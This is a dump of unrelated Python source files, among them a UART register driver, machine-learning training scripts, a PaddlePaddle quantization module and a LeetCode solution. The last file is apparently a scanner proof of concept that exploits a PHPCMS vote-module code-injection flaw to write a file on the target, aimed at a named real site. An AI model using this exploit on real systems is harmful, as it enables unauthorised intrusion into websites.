self.bus.read_byte_data(shiftedDeviceAddress, shiftedRegisterAddress) return registerReadValue def writeRegister(self, registerAddress, data): shiftedDeviceAddress = self.DEVICE_ADDRESS >> 1 shiftedRegisterAddress = registerAddress << 3 self.bus.write_byte_data(shiftedDeviceAddress, shiftedRegisterAddress, data) ##Set the desired baudrate of chips UART## def setBaudrate(self, baudrate): clockDivisor = (self.readRegister(self.registers.MCR) & 0b10000000) >> 7 if(clockDivisor == 0): prescaler = 1 elif(clockDivisor == 1): prescaler = 4 divisor = int((self.crystalFrequency / prescaler) / (baudrate * 16)) lowerDivisor = (divisor & 0xFF) higherDivisor = (divisor & 0xFF00) >> 8 self.setRegisterBit(self.registers.LCR, 7) self.writeRegister(self.registers.DLL, lowerDivisor) self.writeRegister(self.registers.DLH, higherDivisor) self.unsetRegisterBit(self.registers.LCR, 7) ##Set the desired UART attributes## def setUARTAttributes(self, dataBits, parityType, stopBits): #Calculate bits for LCR register# print("Setting UART attributes.") ##Set the bit in position passed## def setRegisterBit(self, registerAddress, registerBit): current = self.readRegister(registerAddress) updated = current | (1 << registerBit) self.writeRegister(registerAddress, updated) ##Unset the bit in position passed## def unsetRegisterBit(self, registerAddress, registerBit): current = self.readRegister(registerAddress) updated = current & ~(1 << registerBit) self.writeRegister(registerAddress, updated) ##Checks if any data in FIFO buffer## def isDataWaiting(self): register = self.readRegister(self.registers.LSR) isWaiting = register & 0b1 if(isWaiting): return True return False ##Checks number of bytes waiting in FIFO buffer## def dataWaiting(self): return self.readRegister(self.registers.RXLVL) ##Writes to Scratch register and checks successful## def testChip(self): self.writeRegister(self.registers.SPR, 0xFF) if(self.readRegister(self.registers.SPR) != 0xFF): return False return True
0f9da5641c14d6d47418ae74359cbd602a3a8681
178eb0567fd21b65df6f95d7342d971fb253f91e
/AI/Classifiers/models/load.py
d0adbb5c1c02bded01575f019398c91e8808eb4a
[]
no_license
Zhaofan-Su/SemanticAnalysis
defacbcde5f6c541de9c4cfa37138a449c03ce60
f28813bf21d6170ffe826dd7edcad73cc244da9b
refs/heads/master
2020-05-07T11:59:15.138559
2019-04-23T00:53:45
2019-04-23T00:53:45
180,484,689
0
0
null
2019-04-17T02:46:54
2019-04-10T02:20:34
Python
UTF-8
Python
false
false
2,124
py
import os import torch import torch.nn.functional as F import datetime import torch.autograd as autograd import jieba.posseg as pseg from .fasttext import FastText import torchtext.data as data from .input import Dataset from torchtext.vocab import Vectors import os.path as path def _chinese_tokenizer(sentence): exclusion = ["e", "x", "y"] # e 叹词 x 非语素词 y 语气词 return [word for (word, flag) in pseg.cut(sentence) if flag not in exclusion] def load_data(target, config): text_field = data.Field(tokenize=_chinese_tokenizer) label_field = data.Field(sequential=False) train_data, test_data = Dataset.split(target, text_field, label_field, config) embedding = path.join(path.dirname(path.abspath(__file__)), config.PRETRAINED_EMBEDDING) cache = path.join(path.dirname(path.abspath(__file__)), ".vector_cache/") weights = Vectors(name=embedding, cache=cache) text_field.build_vocab([{key: 1} for key in weights.itos], vectors=weights) label_field.build_vocab(train_data) config.EMBED_NUM = len(text_field.vocab) config.EMBED_DIM = len(weights.vectors[0]) config.CLASS_NUM = len(label_field.vocab) - 1 return text_field, label_field def load_model(model_name, ckpt, text_field, config): model = None if model_name == "FastText": model = FastText(config, text_field.vocab.vectors) if config.CUDA: torch.cuda.set_device(config.DEVICE) model = model.cuda() device = config.DEVICE if config.CUDA else "cpu" model.load_state_dict(torch.load(path.join(path.dirname(path.abspath(__file__)), ckpt), map_location=device)) return model def predict(model, text_field, label_field, sentence, config): model.eval() sentence = text_field.preprocess(sentence) # while len(sentence) < 3: # sentence.append("<pad>") sentence = [[text_field.vocab.stoi[x] for x in sentence]] x = torch.tensor(sentence) x = autograd.Variable(x) if config.CUDA: x = x.cuda() output = model(x) _, pred = torch.max(output, 1) return label_field.vocab.itos[pred.data[0]+1] == "0"
3a4928e43a8d2eb7a9e58b5e4c3c04eee176b3f5
0798277f2706998ab80442ac931579eb47f676e5
/bin/metric-markdown
ed615b4e0809a60c37d486fe5df8f258f20d47d9
[ "Apache-2.0" ]
permissive
isabella232/pulse-api-cli
49ed38b0694ab289802f69ee6df4911cf3378e3f
b01ca65b442eed19faac309c9d62bbc3cb2c098f
refs/heads/master
2023-03-18T00:23:15.295727
2016-05-13T15:44:08
2016-05-13T15:44:08
null
0
0
null
null
null
null
UTF-8
Python
false
false
817
#!/usr/bin/env python # # Copyright 2015 BMC Software, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # from boundary import MetricMarkdown """ Reads the plugin.json manifest file looks up the definition and then outputs a markdown table """ if __name__ == "__main__": c = MetricMarkdown() c.execute()
9907349705be2a4fdbc48e95c52054b00ad85246
4efcfcaec6cc956d15a1ae966905911809c4de18
/Supervised Deep Learning/Artificial Neural Networks (ANN)/artificial_neural_network.py
72ded64f7630ebf2867544dae348d8c8a1fe4aa0
[ "BSD-3-Clause" ]
permissive
Nikhil-Xavier-DS/Deep-Learning-Algorithms-KERAS
9aa54eebaf688d83efa13767dd0e378339774e9c
7bbda3b1495d2e377abef2938c193afd34d95038
refs/heads/master
2020-03-28T09:00:22.535353
2018-09-09T08:30:32
2018-09-09T08:30:32
148,006,476
0
0
null
null
null
null
UTF-8
Python
false
false
1,994
py
# Artificial Neural Network # Import libraries import numpy as np import matplotlib.pyplot as plt import pandas as pd # Import Dataset dataset = pd.read_csv('Churn_Modelling.csv') X = dataset.iloc[:,3: 13].values y = dataset.iloc[:,13].values # Encoding categorical data from sklearn.preprocessing import LabelEncoder, OneHotEncoder labelencoder_X_1 = LabelEncoder() X[:, 1] = labelencoder_X_1.fit_transform(X[:, 1]) labelencoder_X_2 = LabelEncoder() X[:, 2] = labelencoder_X_2.fit_transform(X[:, 2]) onehotencoder = OneHotEncoder(categorical_features = [1]) X = onehotencoder.fit_transform(X).toarray() X = X[:, 1:] # Splitting into training set & test set from sklearn.cross_validation import train_test_split X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0) # Feature scaling from sklearn.preprocessing import StandardScaler sc_X = StandardScaler() X_train = sc_X.fit_transform(X_train) X_test = sc_X.transform(X_test) # Let us make ANN # Import Keras library import keras from keras.models import Sequential from keras.layers import Dense # Initializing ANN classifier = Sequential() # Adding Input layer and First hidden layer classifier.add(Dense(output_dim = 6, init = 'uniform', activation = 'relu', input_dim = 11)) # Adding Second hidden layer classifier.add(Dense(output_dim = 6, init = 'uniform', activation = 'relu')) # Adding Output layer classifier.add(Dense(output_dim = 1, init = 'uniform', activation = 'sigmoid')) # Compiling ANN classifier.compile(optimizer = 'adam', loss = 'binary_crossentropy', metrics = ['accuracy']) # Fit ANN to training set classifier.fit(X_train, y_train, batch_size = 10, epochs = 100) # Predict and evaluate model y_pred = classifier.predict(X_test) for i in range(0, len(y_pred)): if(y_pred[i] >= 0.5): y_pred[i] = True else: y_pred[i] = False # Confusion Matrix from sklearn.metrics import confusion_matrix cm = confusion_matrix(y_test, y_pred) cm
68ed6146980626889998a60eed343f5932d5d1a2
7e792f54abea89609fcc1317dbbc6b50012c56ec
/main.py
a360c9b3b6cb6ff0e81fd6148244159ed17ed374
[]
no_license
sylvanusm/Bert-abstractive-summarisation
067ba2a53ae8a2d5e99f5024c77f29b52eadd39d
4e56bf0b2188b9684f4b1c2d59e60c5f6b8c090e
refs/heads/main
2023-06-07T17:19:47.812248
2021-06-26T10:28:52
2021-06-26T10:28:52
380,363,935
0
0
null
null
null
null
UTF-8
Python
false
false
2,647
py
from model.transformer import Summarizer from model.common_layer import evaluate from utils import config import torch import wandb import torch.nn as nn import torch.nn.functional as F from tqdm import tqdm import os import time import numpy as np from utils.data import get_dataloaders, InputExample, InputFeatures def count_parameters(model): return sum(p.numel() for p in model.parameters() if p.requires_grad) def train_draft(): train_dl, val_dl, test_dl, tokenizer = get_dataloaders(is_small=config.small) if(config.test): print("Test model",config.model) model = Transformer(model_file_path=config.save_path,is_eval=True) evaluate(model,data_loader_test,model_name=config.model,ty='test') exit(0) model = Summarizer(is_draft=True, toeknizer=tokenizer) print("TRAINABLE PARAMETERS",count_parameters(model)) print("Use Cuda: ", config.USE_CUDA) best_rouge = 0 cnt = 0 eval_iterval = 300 wandb.init(project=config.experiment, config={ "model_name": config.model_name, "learning_rate": config.lr, "batch_size": config.batch_size, "hop": config.hop, "heads": config.heads, "epochs": config.epochs, "beam_size": config.beam_size, "emb_dim": config.emb_dim, 'cuda': config.USE_CUDA }) conf = wandb.config for e in range(config.epochs): # model.train() print("Epoch", e) l = [] pbar = tqdm(enumerate(train_dl),total=len(train_dl)) for i, d in pbar: loss = model.train_one_batch(d) l.append(loss.item()) pbar.set_description("TRAIN loss:{:.4f}".format(np.mean(l))) if i%eval_iterval==0: # model.eval() loss,r_avg, r1, r2, rl = evaluate(model,val_dl,model_name=config.model,ty="train") wandb.log({"epoch": e, "loss":loss, "r_avg":r_avg, "r1":r1, "r2":r2, "rl":rl}) # each epoch is long,so just do early stopping here. if(r_avg > best_rouge): best_rouge = r_avg cnt = 0 model.save_model(loss,e,r_avg) else: cnt += 1 if(cnt > 20): break # model.train() # model.eval() loss,r_avg, r1, r2, rl = evaluate(model,val_dl,model_name=config.model,ty="valid") wandb.finish() if __name__ == "__main__": train_draft()
db3d9f7ffa0daf93dc6ef9d1b818888be5ac8e5d
93afa6da4a41e6346079cf437aa11fe27ae84d93
/venv/bin/easy_install
c86211b025ea693cb90960dd17d613e34059f37e
[]
no_license
alexbatashev/rungekutta
20695e3d0706b7cfde2f7b4c0150e74122b4a6d5
7c71228b6bbbeebe0771b45e4d85c342f2d2fdd7
refs/heads/master
2020-05-05T06:56:03.982750
2019-04-07T08:29:28
2019-04-07T08:29:28
179,806,651
0
0
null
null
null
null
UTF-8
Python
false
false
454
#!/Users/aleksandrbatasev/PycharmProjects/rungekutta/venv/bin/python # EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==39.1.0','console_scripts','easy_install' __requires__ = 'setuptools==39.1.0' import re import sys from pkg_resources import load_entry_point if __name__ == '__main__': sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0]) sys.exit( load_entry_point('setuptools==39.1.0', 'console_scripts', 'easy_install')() )
a5a6c17c95ae1931b035e24219e5c6d151e18e6e
249cbea53ddfda9cd66486eb197dec8957ab2358
/python/paddle/fluid/contrib/slim/quantization/imperative/qat.py
c5ee9ea6751003c19ef5b43f1af0f09093bded89
[ "Apache-2.0" ]
permissive
Yelrose/Paddle
107df9433cad73d88227674deda29c6fa2115730
c670503220cf8df898f3195d81debde7dcc22ad1
refs/heads/develop
2023-04-08T19:18:29.498548
2021-03-24T12:11:41
2021-03-24T12:11:41
185,934,762
1
0
Apache-2.0
2021-12-15T06:36:37
2019-05-10T06:52:58
Python
UTF-8
Python
false
false
23,992
py
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import collections import logging import numpy as np import sys import os import paddle from paddle.fluid import dygraph, core, framework from paddle.fluid.executor import Executor from paddle.fluid.dygraph.io import INFER_MODEL_SUFFIX, INFER_PARAMS_SUFFIX from paddle.nn import Linear, Conv2D, Conv2DTranspose, MaxPool2D, MaxPool1D, BatchNorm1D, BatchNorm2D, BatchNorm3D from paddle.fluid.dygraph.nn import BatchNorm, Pool2D from paddle.fluid.io import load_inference_model, save_inference_model from paddle.nn.layer.activation import ReLU, LeakyReLU, Sigmoid, ReLU6, Tanh, Softmax, PReLU, Swish from paddle.fluid.log_helper import get_logger from . import quant_nn from .. import quantization_pass __all__ = ['ImperativeQuantAware', 'ImperativeCalcOutScale'] _logger = get_logger( __name__, logging.INFO, fmt='%(asctime)s-%(levelname)s: %(message)s') _op_real_in_out_name = { "conv2d": [["Input", "Filter"], ["Output"]], "depthwise_conv2d": [["Input", "Filter"], ["Output"]], "pool2d": [["X"], ["Out"]], "elementwise_add": [["X", "Y"], ["Out"]], "softmax": [["X"], ["Out"]], "relu": [["X"], ["Out"]], "relu6": [["X"], ["Out"]], "leaky_relu": [["X"], ["Out"]], "prelu": [["X"], ["Out"]], "tanh": [["X"], ["Out"]], "batch_norm": [["X"], ["Y"]], "sigmoid": [["X"], ["Out"]], "swish": [["X"], ["Out"]], } class ImperativeQuantAware(object): """ Add the fake quant logic for given quantizable layers, namely add the quant_dequant computational logic both for activation inputs and weight inputs. """ def __init__(self, weight_bits=8, activation_bits=8, weight_quantize_type='abs_max', activation_quantize_type='moving_average_abs_max', moving_rate=0.9, quantizable_layer_type=['Conv2D', 'Linear'], weight_preprocess_layer=None, act_preprocess_layer=None, weight_quantize_layer=None, act_quantize_layer=None): r""" The constructor for ImperativeQuantAware. Args: weight_bits(int): quantization bit number for weights, whereas the bias is not quantized. activation_bits(int): quantization bit number for activations. weight_quantize_type(str): quantization type for weights, which supports 'abs_max' now. The 'moving_average_abs_max' usually is not used for weights, since weights are fixed once the model is well trained. activation_quantize_type(str): quantization type for activations, which supports 'abs_max' and 'moving_average_abs_max' now. If using 'abs_max' mode, the quantization scale will be calculated dynamically each step in both training and testing period. If using 'moving_average_abs_max', the static quantization scale will be calculated during training and used in inference. moving_rate(float): the parameter for 'moving_average_abs_max' quantization. quantizable_layer_type(list[str]): List the type of layers that will be quantized. Default is ['Conv2D', 'Linear']. The quantizable_op_type in QuantizationFreezePass and ConvertToInt8Pass must be the same as this. weight_preprocess_layer(paddle.nn.Layer, optional): A paddle Layer that defines how to preprocess weight before quantization. Using this can quickly test if user's preprocess method works or not. The input is non-quantized weight and function returns processed weight to be quantized. If None, the weight will be quantized directly. Default is None. act_preprocess_layer(paddle.nn.Layer, optional): A paddle Layer that defines how to preprocess activation before quantization. Using this can quickly test if user's preprocess method works or not. The input is non-quantized activation and function returns processed activation to be quantized. If None, the activation will be quantized directly. Default is None. weight_quantize_layer(paddle.nn.Layer, optional): A paddle Layer that defines how to quantize weight. Using this can quickly test if user's quantization method works or not. In this layer, user should both define quantization method and dequantization method, that is, the function's input is non-quantized weight and returns dequantized weight. If None, will use quantization op defined by 'weight_quantize_type'. Default is None. act_quantize_layer(paddle.nn.Layer, optional): A paddle Layer that defines how to quantize activation. Using this can quickly test if user's quantization method works or not. In this layer, user should both define quantization method and dequantization method, that is, the function's input is non-quantized activation and returns dequantized activation. If None, will use quantization op defined by 'activation_quantize_type'. Default is None. Note: If user sets attribute 'skip_quant' to a Layer that support dynamic quantization and sets it to true, the layer would not be quantized during training. If this attribute is not sets or the attribute is false, the Layer would be qunatized in training. Examples 1: .. code-block:: python import paddle from paddle.fluid.contrib.slim.quantization \ import ImperativeQuantAware from paddle.vision.models \ import resnet model = resnet.resnet50(pretrained=True) imperative_qat = ImperativeQuantAware( weight_quantize_type='abs_max', activation_quantize_type='moving_average_abs_max') # Add the fake quant logical. # The original model will be rewrite. # The outscale of outputs in supportted layers would be calculated. imperative_qat.quantize(model) # Fine-tune the quantized model # ... # Save quant model for the inference. imperative_qat.save_quantized_model( layer=model, model_path="./resnet50_qat", input_spec=[ paddle.static.InputSpec( shape=[None, 3, 224, 224], dtype='float32')]) Examples 2: .. code-block:: python import paddle from paddle.fluid.contrib.slim.quantization \ import ImperativeQuantAware class ImperativeModel(paddle.nn.Layer): def __init__(self): super(ImperativeModel, self).__init__() # self.linear_0 would skip the quantization. self.linear_0 = paddle.nn.Linear(784, 400) self.linear_0.skip_quant = True # self.linear_1 would not skip the quantization. self.linear_1 = paddle.nn.Linear(400, 10) self.linear_1.skip_quant = False def forward(self, inputs): x = self.linear_0(inputs) x = self.linear_1(inputs) return x model = ImperativeModel() imperative_qat = ImperativeQuantAware( weight_quantize_type='abs_max', activation_quantize_type='moving_average_abs_max') # Add the fake quant logical. # The original model will be rewrite. # # There is only one Layer(self.linear1) would be added the # fake quant logical. imperative_qat.quantize(model) # Fine-tune the quantized model # ... # Save quant model for the inference. imperative_qat.save_quantized_model( layer=model, model_path="./imperative_model_qat") """ super(ImperativeQuantAware, self).__init__() self._weight_bits = weight_bits self._activation_bits = activation_bits self._moving_rate = moving_rate self._activation_quantize_type = activation_quantize_type self._weight_quantize_type = weight_quantize_type self._weight_pre_layer = weight_preprocess_layer self._act_pre_layer = act_preprocess_layer self._weight_quant_layer = weight_quantize_layer self._act_quant_layer = act_quantize_layer self._out_scale = ImperativeCalcOutScale() t_check = lambda method: method is None or issubclass(method, dygraph.layers.Layer) assert t_check( self._weight_pre_layer), "weight_preprocess should be nn.Layer" assert t_check(self._act_pre_layer), "act_preprocess should be nn.Layer" assert t_check( self._weight_quant_layer), "weight_quantize should be nn.Layer" assert t_check(self._act_quant_layer), "act_quantize should be nn.Layer" quant_type = { 'abs_max', 'moving_average_abs_max', 'channel_wise_abs_max' } assert activation_quantize_type != 'channel_wise_abs_max', \ "The activation quantization type does not support 'channel_wise_abs_max'." if activation_quantize_type not in quant_type: raise ValueError( "Unknown activation_quantize_type : '%s'. It can only be " "'abs_max' or 'moving_average_abs_max' now." % (str(activation_quantize_type))) if weight_quantize_type not in quant_type: raise ValueError( "Unknown weight_quantize_type: '%s'. It can only be " "'abs_max' or 'moving_average_abs_max' or 'channel_wise_abs_max' now." % (str(weight_quantize_type))) self._quant_layers_map = { 'Conv2D': Conv2D, 'Linear': Linear, 'Pool2D': Pool2D, 'ReLU': ReLU, 'LeakyReLU': LeakyReLU, 'ReLU6': ReLU6, 'Softmax': Softmax, 'Tanh': Tanh, 'Swish': Swish } self._quantizable_layer_type = tuple( self._quant_layers_map[layer] if layer in self._quant_layers_map else layer for layer in quantizable_layer_type) for layer in self._quantizable_layer_type: assert not isinstance( layer, str), "{} is unspported to be quantized.".format(layer) def quantize(self, model): """ According to weights' and activations' quantization types, the model will be added some fake quant ops, such as fake_quantize_dequantize_moving_average_abs_max, fake_quantize_dequantize_abs_max and so on. At the same time, the out_scale value of outputs would be calculated. Args: model(fluid.dygraph.Layer): the model to be quantized. Returns: None """ for name, layer in model.named_sublayers(): if not isinstance(layer, self._quantizable_layer_type): continue if hasattr(layer, "skip_quant") and layer.skip_quant == True: continue last_idx = 0 idx = 0 obj = model parent = model while idx < len(name): if (name[idx] == '.'): if hasattr(parent, name[last_idx:idx]): obj = getattr(obj, name[last_idx:idx]) parent = obj last_idx = idx + 1 idx += 1 target = name[last_idx:idx] quant_layer = self._get_quantized_counterpart(layer) setattr(quant_layer, "layer_name", layer.full_name()) setattr(obj, target, quant_layer) self._out_scale.calc_out_scale(model) def _get_quantized_counterpart(self, layer): quant_layers = tuple(self._quant_layers_map.values()) quantized_counterpart = tuple('Quantized' + k for k in self._quant_layers_map.keys()) predicate = lambda value: isinstance(layer, value) index_generator = (i for i, v in enumerate(quant_layers) if predicate(v)) try: index = next(index_generator) except StopIteration: _logger.fatal("The layer {} is unsupported to be quantized.".format( layer.full_name())) sys.exit(-1) layer_with_weight = ['QuantizedConv2D', 'QuantizedLinear'] if quantized_counterpart[index] not in layer_with_weight: quant_layer_class_name = 'QuantizedNoweightLayer' else: quant_layer_class_name = quantized_counterpart[index] quantized_layer = quant_nn.__dict__[quant_layer_class_name]( layer, self._weight_bits, self._activation_bits, self._moving_rate, self._weight_quantize_type, self._activation_quantize_type, self._weight_pre_layer, self._act_pre_layer, self._weight_quant_layer, self._act_quant_layer) return quantized_layer def save_quantized_model(self, layer, path, input_spec=None, **config): self._out_scale.save_quantized_model(layer, path, input_spec, **config) class ImperativeCalcOutScale(object): def __init__(self, moving_rate=0.9): """ Add the logic of calculating and setting output quantization scales of some layers. These output quantization scales may be used by tensorRT or some other inference engines. Args: moving_rate(float): The decay coefficient of moving average. The default value is 0.9. """ super(ImperativeCalcOutScale, self).__init__() self._moving_rate = moving_rate self._out_scale_layer_type_list = ( BatchNorm, BatchNorm1D, BatchNorm2D, BatchNorm3D, Conv2D, LeakyReLU, Linear, PReLU, Pool2D, MaxPool1D, MaxPool2D, ReLU, ReLU6, Sigmoid, Softmax, Tanh, Swish) self._register_hook_handle_list = [] self._out_scale_dict = collections.OrderedDict() def calc_out_scale(self, model): """ Insert the `moving_average_abs_max_scale` op to calculate output scale of Specific layers in model. Args: model(fluid.dygraph.Layer): The target model which would be calculate the output quantization scale. Returns: None """ assert isinstance( model, dygraph.Layer), "model must be the instance of dygraph.Layer" for _, layer in model.named_sublayers(): if not isinstance(layer, self._out_scale_layer_type_list): if 'quantized_' not in layer.full_name(): continue forward_post_hook_handle = layer.register_forward_post_hook( self._forward_post_hook) self._register_hook_handle_list.append(forward_post_hook_handle) def save_quantized_model(self, layer, path, input_spec=None, **config): """ Save the quantized model for the inference. Args: layer (Layer): The Layer to be saved. path (str): The path prefix to save model. The format is ``dirname/file_prefix`` or ``file_prefix``. input_spec (list[InputSpec|Tensor], optional): Describes the input of the saved model's forward method, which can be described by InputSpec or example Tensor. If None, all input variables of the original Layer's forward method would be the inputs of the saved model. Default None. **configs (dict, optional): Other save configuration options for compatibility. We do not recommend using these configurations, they may be removed in the future. If not necessary, DO NOT use them. Default None. The following options are currently supported: (1) output_spec (list[Tensor]): Selects the output targets of the saved model. By default, all return variables of original Layer's forward method are kept as the output of the saved model. If the provided ``output_spec`` list is not all output variables, the saved model will be pruned according to the given ``output_spec`` list. Returns: None """ assert isinstance( layer, dygraph.Layer), "model must be the instance of dygraph.Layer" is_dynamic_mode = False with dygraph.guard(): layer.eval() for handle in self._register_hook_handle_list: handle.remove() for key in self._out_scale_dict: self._out_scale_dict[key] = float(self._out_scale_dict[key] .numpy()) if paddle.in_dynamic_mode(): is_dynamic_mode = True paddle.enable_static() paddle.jit.save(layer=layer, path=path, input_spec=input_spec, **config) if core.is_compiled_with_cuda(): place = core.CUDAPlace(0) else: place = core.CPUPlace() exe = Executor(place) file_prefix = os.path.basename(path) dirname = os.path.dirname(path) model_filename = file_prefix + INFER_MODEL_SUFFIX params_filename = file_prefix + INFER_PARAMS_SUFFIX [inference_program, feed_target_names, fetch_targets] = ( load_inference_model( dirname=dirname, executor=exe, model_filename=model_filename, params_filename=params_filename)) # Traverse all ops in the program and find out the op matching # the Layer in the dynamic graph. layer_var_dict = collections.OrderedDict() ops_list = [key for key, _ in self._out_scale_dict.items()] op_count = 0 conv_count = 0 for block in inference_program.blocks: for op in block.ops: if op.type in _op_real_in_out_name: if op.type in ["batch_norm", "pool2d"]: if op.type == "pool2d" and op.attr( "pooling_type") != "max": continue op_count = self.op_match(op, ops_list, op_count) if op_count >= len(ops_list): continue op._set_attr('out_threshold', self._out_scale_dict[ops_list[op_count]]) op_count += 1 else: output_var_names = quantization_pass._get_op_output_var_names( op) for output_var_name in output_var_names: output_var_tensor = block.var(output_var_name) if output_var_tensor.dtype not in [ core.VarDesc.VarType.FP64, core.VarDesc.VarType.FP32 ]: continue # Because the Layer in dygraph may correspond to multiple ops # in static program after being saved. To ensure correctness, # the outscale collected for output of dygraph Layer can only # be set to the last op in the corresponding ops in static program. # # We can judge the execution order of the ops which corresponding # to dygraph Layer by the name of output. And use dict to save # the corresponding relationship between the dygraph Layer and the # static graph op that needs to set the outscale attribute. if '.' not in output_var_name: continue dynamic_layer_name, var_name_suffix = output_var_name.split( ".") if dynamic_layer_name in layer_var_dict: if layer_var_dict[dynamic_layer_name][ 0] < var_name_suffix: layer_var_dict[dynamic_layer_name] = [ var_name_suffix, op ] else: layer_var_dict[dynamic_layer_name] = [ var_name_suffix, op ] # Because the naming styles of static and dynamic graph are different, # in order to avoid mistakes, we unify the name here. for (layer_name, var_name_op_list) in layer_var_dict.items(): if 'prelu' in layer_name: layer_name = layer_name.replace('prelu', 'p_re_lu') if 'relu' in layer_name: layer_name = layer_name.replace('relu', 're_lu') if 'conv2d' in layer_name: layer_name = 'conv2d_' + str(conv_count) conv_count = conv_count + 1 if layer_name not in self._out_scale_dict: continue var_name_op_list[1]._set_attr('out_threshold', self._out_scale_dict[layer_name]) # Save the processed program. save_inference_model( dirname=dirname, feeded_var_names=feed_target_names, target_vars=fetch_targets, executor=exe, main_program=inference_program.clone(), model_filename=model_filename, params_filename=params_filename) if is_dynamic_mode: paddle.disable_static() def op_match(self, op, ops_list, op_count): while op_count < len(ops_list) and op.type not in ops_list[op_count]: op_count += 1 while op_count < len(ops_list) and op.type is "pool2d" and op.attr( "pooling_type") != "max": op_count += 1 return op_count def _forward_post_hook(self, layer, input, output): assert isinstance( output, (core.VarBase, framework.Variable) ), "Multiple outputs are not currently supported in ImperativeOutScale." if output.dtype not in [ core.VarDesc.VarType.FP32, core.VarDesc.VarType.FP64 ]: return if not hasattr(layer, "_out_scale"): layer._out_scale = quant_nn.MovingAverageAbsMaxScale( output.name, self._moving_rate, output.dtype) scale_out = layer._out_scale(output) if hasattr(layer, 'layer_name'): layer_name = layer.layer_name else: layer_name = layer.full_name() self._out_scale_dict[layer_name] = scale_out
f898a507fb5c8d1476d837dc594f7b5fa3b68cd6
b80b3b82bb1f4c4019e56bf6eed859d9e1ec024b
/python/tolower.py
4b443cc2001eef828e7353d23079405cbb61b962
[]
no_license
NotaCSstudent/leetcode
be484537f20302557411ed0a2d653703b4c86abe
13c3fc89e492209f70fcb8e7756c8553f5736a1e
refs/heads/main
2023-06-08T22:59:41.680890
2021-06-20T13:37:46
2021-06-20T13:37:46
372,983,624
0
0
null
null
null
null
UTF-8
Python
false
false
106
py
class Solution: def toLowerCase(self, s: str) -> str: s = s.lower() return s
95d38eb622dd57ea6cf2bba55e5202edeb6e0e3b
43ff15a7989576712d0e51f0ed32e3a4510273c0
/tools/pocs/bugscan/exp_679.py
798104fb95f83ba1ff04752dfd711df064cc3623
[]
no_license
v1cker/kekescan
f2b51d91a9d6496e2cdc767eb6a600171f513449
3daa1775648439ba9e0003a376f90b601820290e
refs/heads/master
2020-09-19T16:26:56.522453
2017-06-15T02:55:24
2017-06-15T02:55:24
94,495,007
6
3
null
null
null
null
UTF-8
Python
false
false
1,954
py
# -*- coding: utf-8 -*- from dummy import * from miniCurl import Curl curl = Curl() # !/usr/bin/dev python # -*- coding:utf-8 -*- """ reference: http://www.wooyun.org/bugs/wooyun-2015-0104157 http://www.beebeeto.com/pdb/poc-2015-0086/ """ import re import urllib import urllib2 import base64 import random def get_vote_links(args): vul_url = args vote_url = '%sindex.php?m=vote' % vul_url code, head, res, _, _ = curl.curl(vote_url) ids = [] for miter in re.finditer(r'<a href=.*?subjectid=(?P<id>\d+)', res, re.DOTALL): ids.append(miter.group('id')) if len(ids) == 0: return None return list(set(ids)) def assign(service, args): if service == 'phpcms': return True, args pass def audit(args): vul_url = args ids = get_vote_links(args) file_name = 'w2x5Tt_%s.php' % random.randint(1,3000) base64_name = base64.b64encode(file_name) if ids: for i in ids: exploit_url = '%sindex.php?m=vote&c=index&a=post&subjectid=%s&siteid=1' % (vul_url, i) payload = {'subjectid': 1, 'radio[]': ');fputs(fopen(base64_decode(%s),w),"vulnerable test");' % base64_name} post_data = urllib.urlencode(payload) code,head,body,_,_=curl.curl('-d "%s" %s' % (post_data, exploit_url)) if code==200: verify_url = '%sindex.php?m=vote&c=index&a=result&subjectid=%s&siteid=1' % (vul_url, i) code,head,body,_,_=curl.curl(verify_url) if code==200: shell_url = '%s%s' % (vul_url, file_name) code, head, res, _, _ = curl.curl(shell_url) if code == 200 and 'vulnerable test' in res: security_hole(vul_url) if __name__ == "__main__": from dummy import * audit(assign('phpcms', 'http://www.jkb.com.cn/')[1])